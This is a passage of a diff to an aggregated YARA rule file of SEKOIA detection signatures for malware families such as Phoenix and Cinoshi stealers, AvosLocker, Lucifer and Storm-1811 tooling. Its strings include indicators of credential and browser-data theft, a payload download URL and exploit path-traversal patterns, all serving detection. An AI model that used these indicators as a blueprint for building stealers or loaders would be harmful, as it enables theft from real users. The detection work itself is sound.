 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_yasso_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1d715b0962ba9ecbe11649ea85870a8f884f6dd7eda27b1f8eff0d7f5de8c765"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_oilrig_oilbooster_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9562d373ba7602d250aec1eefa2d671da64e897e490da284ffa0e310074266cf"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227464,27 +228037,26 @@ rule SEKOIA_Tool_Yasso_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Yasso/cmd.setting"
-		$ = "Yasso/cmd.Client"
-		$ = "Yasso/cmd.IdentifyResult"
-		$ = "Yasso/cmd.RespLab"
-		$ = "Go build ID"
+		$ = "/rt.ovf" wide ascii
+		$ = "User-Agent: " wide ascii
+		$ = "/me/drive/items" wide ascii
+		$ = "client_secret" wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 15MB and filesize < 20MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 5MB and all of them
 }
-rule SEKOIA_Implant_Win_Pingpull : FILE
+rule SEKOIA_Apt_Cloudatlas_Powershower_Module : FILE
 {
 	meta:
-		description = "Detect the PingPull malware used by GALLUM in 2022"
+		description = "Detects CloudAtlas PowerShower module"
 		author = "Sekoia.io"
-		id = "521615d4-912b-4581-b5a9-a8b158ac9496"
-		date = "2022-06-13"
+		id = "dd688058-3d5d-46a7-8380-fe961c3327cd"
+		date = "2022-11-30"
 		modified = "2024-12-19"
-		reference = "https://unit42.paloaltonetworks.com/pingpull-gallium/#Protections-and-Mitigations"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_pingpull.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "778d429e4c6d7575ddeea5144f9554f2b6ca46175d4202d338bef01dc9668b97"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cloudatlas_powershower_module.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7542eb882ee44203d806ad936126be2476b6e3a85ad8c93b6fd6c8226fe82617"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227492,49 +228064,58 @@ rule SEKOIA_Implant_Win_Pingpull : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "PROJECT_%s_%s_%08X"
+		$ = "$env:temp" ascii wide
+		$ = "foreach($item in $zip.items" ascii wide
+		$ = "echo $result" ascii wide
+		$ = "pass.txt" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of them and filesize < 10000
 }
-rule SEKOIA_Apt_Dark_Pink_Pdb_Path : FILE
+rule SEKOIA_Win_Loader_Astasialoader_Strings : FILE
 {
 	meta:
-		description = "Detects PDB path of some Dark Pink sample"
+		description = "AstasiaLoader strings"
 		author = "Sekoia.io"
-		id = "695586dc-66de-4f9d-814a-2d81261a7357"
-		date = "2023-01-16"
+		id = "8dfabf28-4b5a-43db-87e9-5b9080541ec3"
+		date = "2023-08-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_dark_pink_pdb_path.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f67e0d50975697424313acc77a9c86e1c2b41fde1663e4f5d8f4765acb997775"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/win_loader_astasialoader_strings.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "44b6f7508a82ff6a4d65defc189303eeee393b5fd498de73d74d0a2c75c87401"
+		logic_hash = "02a7bed506865d761ec03b8de4b7fc636b71f48c62e933013f2ffa23deabb62e"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "C:\\Users\\hoang\\source\\repos\\Cucky\\Cucky\\obj\\Release\\net46\\Cucky.pdb" wide ascii
-		$s2 = "C:\\Users\\build\\source\\repos\\CtealWebCredential\\Release\\CtealWebCredential.pdb" wide ascii
+		$s1 = "newuploaders" wide
+		$s2 = "\\infected.exe" wide
+		$s3 = "AstasiaLoader" wide
+		$s4 = "Astasia.pdb" ascii
+		$s5 = "ip-api.com/line/?fields=hosting" wide
+		$s6 = "https://api.telegram.org/bot" wide
+		$s7 = "currentscript.txt" wide
+		$s8 = "sessionlog.txt" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 5MB and any of them
+		uint16be( 0 ) == 0x4d5a and filesize > 50KB and filesize < 1MB and 5 of them
 }
-rule SEKOIA_Apt_Cottonsandstorm_Win_Implant : FILE
+rule SEKOIA_Exploit_Linux_Eop_Rationallove_Strings : FILE
 {
 	meta:
-		description = "Detects a simple win implant used by Cotton Sandstorm"
+		description = "Detects RationalLove Local Privesc exploit"
 		author = "Sekoia.io"
-		id = "04a5255c-f9bb-4612-b0e2-ed0326867055"
-		date = "2024-11-05"
+		id = "e71e026e-ca2c-42b7-b552-b3fd013676db"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cottonsandstorm_win_implant.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "f797d71ed07d6e05556300e4ce0f2927"
-		logic_hash = "dcb25ee236ca52f23cc6bfdbcedcbc6d407e88f06341e684f202a59954733ade"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/exploit_linux_eop_rationallove_strings.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "84a53a1d4f08e178a5cf1c968b3b98ae8624c3d052760517ec88bddd25833108"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227542,30 +228123,25 @@ rule SEKOIA_Apt_Cottonsandstorm_Win_Implant : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "DIR =>" wide
-		$ = "type=machines&md5=" wide
-		$ = "File =>" wide
-		$ = "&ip=" wide fullword
-		$ = "&un=" wide fullword
-		$ = "&cp=" wide fullword
-		$ = "myFile\";filename=" ascii
-		$ = "ifB75BcjsRBhy2et" ascii
+		$ = "../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/"
+		$ = "Detected OS version: %s"
+		$ = "Content-Type: text/plain; charset=UTF-8"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Infostealer_Win_Phoenix : FILE
+rule SEKOIA_Apt_Kimsuky_Sharpext_Devtoolmodule_Strings : FILE
 {
 	meta:
-		description = "Finds Phoenix Stealer samples based on specific strings"
+		description = "Detects the DevTool module used by SharpExt"
 		author = "Sekoia.io"
-		id = "d63a8fcf-f897-4c36-a6ce-4bd4ae0154e5"
-		date = "2023-06-20"
+		id = "6f589a9c-344a-4ddc-929e-f123a2c3c187"
+		date = "2022-07-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_phoenix.yar#L1-L33"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c8a3a9a36c978cfc28fc6e21af10894161279dfd2e2ad665c3296fda10f6303d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_sharpext_devtoolmodule_strings.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "61007801d28636c6d88b14225f34910d03e82337520257637a5017d58600b2bc"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227573,137 +228149,110 @@ rule SEKOIA_Infostealer_Win_Phoenix : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "nkbihfbeogaeaoehlefnkodbefgpgknn" ascii
-		$str02 = "Discord\\Tokens.txt" ascii
-		$str03 = "SOFTWARE\\OpenVP" ascii
-		$str04 = "config_dir" ascii
-		$str05 = "| Last Login:" ascii
-		$str06 = "| Games:" ascii
-		$str07 = "| Host:" ascii
-		$str08 = "| Port:" ascii
-		$str09 = "| User:" ascii
-		$str10 = "| Pass:" ascii
-		$str11 = "Grabber.rar" ascii
-		$str12 = "\\GHISLER\\wcx_ftp.ini" ascii
-		$str13 = "Clipboard.txt" ascii
-		$str14 = "PROCESSOR_ARCHITECTURE" ascii
-		$str15 = "PROCESSOR_IDENTIFIER" ascii
-		$str16 = "Log.txt" ascii
-		$str17 = "xXxXxXxXxXx" ascii
-		$str18 = "hq101ejedmwcvvasd02kw" ascii
+		$ = "packetProc = function" ascii fullword
+		$ = "var url = request.request.url" ascii fullword
+		$ = "https://mail" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 15 of them and filesize > 500KB
+		all of them and filesize < 50KB
 }
-rule SEKOIA_Kimsuky_Konni_Dll : FILE
+rule SEKOIA_Storm_1811_Screenconnect_Update
 {
 	meta:
-		description = "Rule based on structure offset and file extension"
+		description = "Detects files used in a campaign performed by the intrusion set Storm-1811"
 		author = "Sekoia.io"
-		id = "6a20c492-e932-41bd-ac4a-01d35bfb0c49"
-		date = "2022-09-12"
+		id = "252ef24a-14dc-41e8-ba91-dcb9b6deb428"
+		date = "2024-06-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/kimsuky_konni_dll.yar#L1-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7099156decdfe35cde22958133d851479f12180fff7b5744af0c549ab8259636"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/storm_1811_screenconnect_update.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ad61e28566375fd3c029df79e1b608aac921ab8121a43bd01314c9112197c32e"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 55
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ext_1 = ".zip" wide ascii fullword
-		$ext_2 = ".cab" wide ascii fullword
-		$ext_3 = ".rar" wide ascii fullword
-		$ext_4 = ".ini" wide ascii fullword
-		$ext_5 = ".dat" wide ascii fullword
-		$offset_structure_1 = { 8d ?? 08 02 00 00 }
-		$offset_structure_2 = { 8d ?? 10 04 00 00 }
-		$offset_structure_3 = { 8d ?? 18 06 00 00 }
-		$offset_structure_4 = { 8d ?? 20 08 00 00 }
-		$offset_structure_5 = { 8d ?? 28 0a 00 00 }
-		$offset_structure_6 = { 89 ?? f8 11 00 00 }
-		$offset_structure_7 = { 8d ?? fc 11 00 00 }
-		$offset_structure_8 = { 89 ?? 0c 12 00 00 }
-		$offset_structure_9 = { 89 ?? 10 12 00 00 }
+		$s1 = "upd100.appspot.com/update/u.zip" ascii fullword
+		$s2 = "Unzip ok" ascii fullword
+		$s3 = "Installing update" ascii fullword
+		$s4 = "Administrators" ascii fullword
+		$s5 = "I am not admin" ascii fullword
+		$s6 = "I am admin" ascii fullword
+		$s7 = "ScreenConnect.ClientSetup.exe" ascii fullword
+		$s8 = "for %%x in (%IPS%) do (" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 11MB and all of them
+		6 of them
 }
-
-rule SEKOIA_Loader_Win_Dodgebox
+rule SEKOIA_Emmenhtal_Strings_Hta_Exe : FILE
 {
 	meta:
-		description = "Detect the DodgeBox malware using several criteria"
+		description = "Emmenhtal Loader string"
 		author = "Sekoia.io"
-		id = "8d5f94f3-1add-4f34-ba9e-f8f576c4e5b8"
-		date = "2024-07-15"
+		id = "64e08610-e8a4-4edd-8f6b-d4e8d2b47d87"
+		date = "2024-09-06"
 		modified = "2024-12-19"
-		reference = "https://www.zscaler.com/blogs/security-research/dodgebox-deep-dive-updated-arsenal-apt41-part-1"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_dodgebox.yar#L4-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e859da15a065454d273c4040b4e3409c3046cbcee135497bdcce6cff620c3cfb"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/emmenhtal_strings_hta_exe.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "e86a22f1c73b85678e64341427c7193ba65903f3c0f29af2e65d7c56d833d912"
+		logic_hash = "93f85a4ccb58c6aeb664c4c843ff80a4ab7b4308a944537f7ebe087515a61659"
 		score = 75
-		quality = 80
-		tags = ""
+		quality = 55
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "c6a3a1ea84251aed908702a1f2a565496d583239c5f467f5dcd0cfc5bfb1a6db"
-		hash2 = "33fd050760e251ab932e5ca4311b494ef72cee157b20537ce773420845302e49"
+
+	strings:
+		$char = / = String\.fromCharCode\([a-zA-Z]{2,4},[a-zA-Z]{2,4},/
+		$var = "var "
+		$eval = "eval("
+		$script1 = "<script>"
+		$script2 = "</script>MZ"
 
 	condition:
-		pe.imphash( ) == "aeea1135af87e6b6b23fa7da995967ea" or hash.md5 ( pe.rich_signature.clear_data ) == "1c850cf955b35f60ee6c12d01161d95d" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "4a80edcce2a5ac85c3f849172ee89c0f" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "53781057440f51882c38d3a9ef611775" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "801b286d84a97fe919721843ab77210d" )
+		uint16be( 0 ) == 0x4d5a and all of them and $var in ( @script1 .. @script1 + 2000 ) and $char in ( @var .. @var + 100 )
 }
 
-rule SEKOIA_Apt_Apt28_Susp_Graphite_Downloader : FILE
+rule SEKOIA_Ransomware_Lin_Avoslocker_Sections : FILE
 {
 	meta:
-		description = "Matches the routine which decrypts the RSA key blob in the Graphite downloader"
+		description = "Detect AvosLocker ransomware for Linux by using its section hashes"
 		author = "Sekoia.io"
-		id = "9c9da5fe-ffd6-4c45-8ce1-9a6cf4fa2fda"
-		date = "2022-01-26"
+		id = "3a7bf14d-24fb-47c9-b073-dd734f808983"
+		date = "2022-02-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt28_susp_graphite_downloader.yar#L3-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ca5aa7ea995aca9003fd98da2fba7bbec1e049d979a6b05e07b80876bab5a1c9"
-		score = 65
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_lin_avoslocker_sections.yar#L4-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "67becae97ccfaf2e62c0329e23a91b1134c265bc83b1fc9091b170a1e04f34d4"
+		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$gen = { 33 D2
-        8B C1
-        6A ??
-        5E
-        F7 F6
-        8A 82 ?? ?? ?? ??
-        30 81 ?? ?? ?? ??
-        41
-        81 F9 94 04 00 00
-        72 E2 }
+		hash1 = "0cd7b6ea8857ce827180342a1c955e79c3336a6cf2000244e5cfd4279c5fc1b6"
+		hash2 = "7c935dcd672c4854495f41008120288e8e1c144089f1f06a23bd0a0f52a544b1"
+		hash3 = "10ab76cd6d6b50d26fde5fe54e8d80fceeb744de8dbafddff470939fac6a98c4"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and $gen and pe.number_of_exports == 1
+		uint32( 0 ) == 0x464c457f and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "91476dafa5ef669483350538fa6ec4cb" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "c2b21b2556c9d751e203965c825f8a81" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "f858d36231ba743ad8c898d86a67a864" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "7dea362b3fac8e00956a4952a3d4f474" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "489c87d7b1a694980587dfb413fb2afc" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "972e27e9f115278244f5e4ae89dd412a" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "d1f5b688a92b611e1363945fa552a9d7" )
 }
-rule SEKOIA_Apt_Malware_Pocoproxy : FILE
+rule SEKOIA_Infostealer_Win_Cinoshistealer : FILE
 {
 	meta:
-		description = "Detects strings in PocoProxy"
+		description = "Finds Cinoshi Stealer samples based on specific strings, or PE resources"
 		author = "Sekoia.io"
-		id = "8b37e37f-339e-4f8b-b792-435096f56af0"
-		date = "2024-08-13"
+		id = "2e9c066b-d5e3-4a25-8954-c10af285bcd3"
+		date = "2023-06-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_malware_pocoproxy.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "2b89f15012512002c656ff821bbbeca0"
-		hash = "8d850fed6bb1f3b60365ed656c6791c5"
-		logic_hash = "217f4eabb5ff4534878b6dd192ae446e651d8510f03ceb501eb33e91199c15a8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_cinoshistealer.yar#L1-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c4d8418a7bd1bf205295100d993562c89b17b80889cad5aac7a74f89e66543ce"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227711,71 +228260,71 @@ rule SEKOIA_Apt_Malware_Pocoproxy : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "-listen" ascii fullword
-		$ = "-connect" ascii fullword
-		$ = "-proxy" ascii fullword
-		$ = "%d-%d-%d %d:%d:%d" ascii fullword
-		$ = "%S://%S:%u%S" wide
-		$ = "\\r\\n[%u(%u/%u/%u/%u)]==> %S  %S>> %S:%d connect ok." wide
-		$ = "\\r\\nnconnect to %S:%d faild." wide
-		$ = "\\r\\nI'm listen %S:%d,welcome..." wide
+		$str01 = "Anaida.exe" ascii wide
+		$str02 = "Anaida.pdb" ascii
+		$str03 = "embedder_download_data" ascii
+		$str04 = "date_password_modified" ascii
+		$str05 = "card_number_encrypted" ascii
+		$str06 = "set_UseZip64WhenSaving" ascii
+		$str07 = "set_CommandText" ascii
+		$str08 = "Nss3CouldNotBeLoaded" ascii
+		$str09 = "formhistory.sqlite" wide
+		$str10 = "logins.json" wide
+		$str11 = "\\nss3.dll" wide
+		$str12 = "\\cookies.sqlite" wide
+		$str13 = "\\places.sqlite" wide
+		$str14 = "\\autofill-profiles.json" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 5 of them
+		uint16( 0 ) == 0x5a4d and 9 of them and filesize > 400KB
 }
-rule SEKOIA_Implant_Any_Sliver_Not_Stripped : FILE
+rule SEKOIA_Apt_Globalshadow : FILE
 {
 	meta:
-		description = "Rule which detects non stripped Sliver PE/Dlls/ELFs/MAC-O."
+		description = "Detects the GLOBALSHADOW malware"
 		author = "Sekoia.io"
-		id = "35543c7c-c39b-4f96-b37c-1d27736e40fc"
-		date = "2021-11-08"
+		id = "2fef6192-25a6-4d6a-8e19-53ad51617d90"
+		date = "2024-09-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_any_sliver_not_stripped.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5240f3ea1fb421697eeb12eb17d0b31c036b53f39c3a590473d87065b5d28e3e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_globalshadow.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "68c16b6f178c88c12c9555169887c321"
+		logic_hash = "034a994be5d5b00fc7d1a43a0cb0b5b576358cea26f3354fd574132560ca0ae3"
 		score = 75
-		quality = 80
+		quality = 30
 		tags = "FILE"
-		modification_date = "2021-12-22"
-		version = "1.1"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$a1 = "github.com/bishopfox/sliver/implant/sliver/"
+		$command1 = "time to rest" wide
+		$command2 = "pw" wide
+		$command3 = "pr" wide
+		$command4 = "dnld" wide
+		$step1 = "step1-" wide
+		$step2 = "step2-" wide
+		$step3 = "step3-" wide
+		$step4 = "step4-" wide
+		$step5 = "step5-" wide
+		$step6 = "step6-" wide
+		$delim = "]#@#[" wide
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe ) and filesize < 11MB and filesize > 8MB and #a1 > 200
+		uint16be( 0 ) == 0x4d5a and 2 of ( $command* ) and 3 of ( $step* ) and $delim and true
 }
-rule SEKOIA_Apt_Yemen_Apk_Guardzoo : FILE
+rule SEKOIA_Bot_Lin_Lucifer_Strings : FILE
 {
 	meta:
-		description = "Detects Dex files containing GuardZoo strings."
+		description = "Catch Lucifer DDoS - lin version - malware based on strings"
 		author = "Sekoia.io"
-		id = "f4004e7c-2904-46ea-a3e6-2bdd3e704fea"
-		date = "2024-08-09"
+		id = "c341b6d0-bc22-4a85-aebb-ed323487f524"
+		date = "2024-09-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_yemen_apk_guardzoo.yar#L1-L40"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "3afad114c68489e2d294720339baf570"
-		hash = "c59d0f5c8d00485199f147b96c5abca0"
-		hash = "75c58948725133160085dc1cfdf602ec"
-		hash = "d76a39ee85263900f7e6eaacb804f5e2"
-		hash = "51356c95dfe1221c0f4ca2475bc787f8"
-		hash = "1d0dd8201c051d9c8d2c945c8b31a48c"
-		hash = "b7b6be5e8eec44dd13e1df1f3908fcf0"
-		hash = "229984f004578a8fa643afb881d81e8c"
-		hash = "f3f1ccb3912c49a0a6ea710a0bd856de"
-		hash = "a3f8365bfa5f8185e8c7eba8efc63165"
-		hash = "7392deaf81ddf50b8a6f2179538f7e81"
-		hash = "c40d56e1586f9fa382c688d624d25525"
-		hash = "629fb04b91c4db4ea282440e20317dab"
-		hash = "bcebc41628196f8bd119f72e1e8eb47c"
-		hash = "f1cfdc9e91c3a20563246cf366b94f10"
-		hash = "a75ffb11adbace40a7c59128adba43ad"
-		logic_hash = "7d98aefa4c2ee7316e0ff47a67d9f19913852d1a451ef38ccb77709394e4ba73"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/bot_lin_lucifer_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "23276c627d27f36c1ec15b1779835b921652a8fcff898041f1920902262faf41"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227783,56 +228332,53 @@ rule SEKOIA_Apt_Yemen_Apk_Guardzoo : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$classes_1 = "GuardZoo.java"
-		$classes_2 = "com/animals"
-		$path_1 = "&Password="
-		$path_2 = "&Coordinates="
-		$path_3 = "&Data="
-		$path_4 = "&Device="
-		$path_5 = "&ISPICTURE="
-		$path_6 = "&Phone_Number="
-		$path_7 = "&Provider="
+		$s1 = "DealwithDDoS" ascii
+		$s2 = "DecryptData" ascii
+		$s3 = "They say I'm rude. I'm not rude at all, but I still want to say, fuck your mother" ascii
+		$s4 = "stratum+tcp://" ascii
+		$s5 = "gethostip" ascii
+		$s6 = "GetmyName" ascii
 
 	condition:
-		uint32be( 0 ) == 0x6465780a and filesize < 10MB and ( ( any of ( $classes_* ) ) and ( 3 of ( $path_* ) ) )
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SEKOIA_Apt_Apt28_Htmlsmuggling
+
+rule SEKOIA_Loader_Win_Dodgebox
 {
 	meta:
-		description = "Detects some kind of HTMLSmuggling used by APT28"
+		description = "Detect the DodgeBox malware using several criteria"
 		author = "Sekoia.io"
-		id = "2e20c992-d971-4c0f-99b3-a7d528c7055a"
-		date = "2023-09-11"
+		id = "8d5f94f3-1add-4f34-ba9e-f8f576c4e5b8"
+		date = "2024-07-15"
 		modified = "2024-12-19"
-		reference = "https://www.zscaler.com/blogs/security-research/steal-it-campaign"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt28_htmlsmuggling.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "47cca1d0a0843c8df43661ee8188dae86cce06e1f3982973871863728d328e89"
+		reference = "https://www.zscaler.com/blogs/security-research/dodgebox-deep-dive-updated-arsenal-apt41-part-1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_dodgebox.yar#L4-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e859da15a065454d273c4040b4e3409c3046cbcee135497bdcce6cff620c3cfb"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$s1 = "click();" ascii
-		$s2 = "window.location.replace("
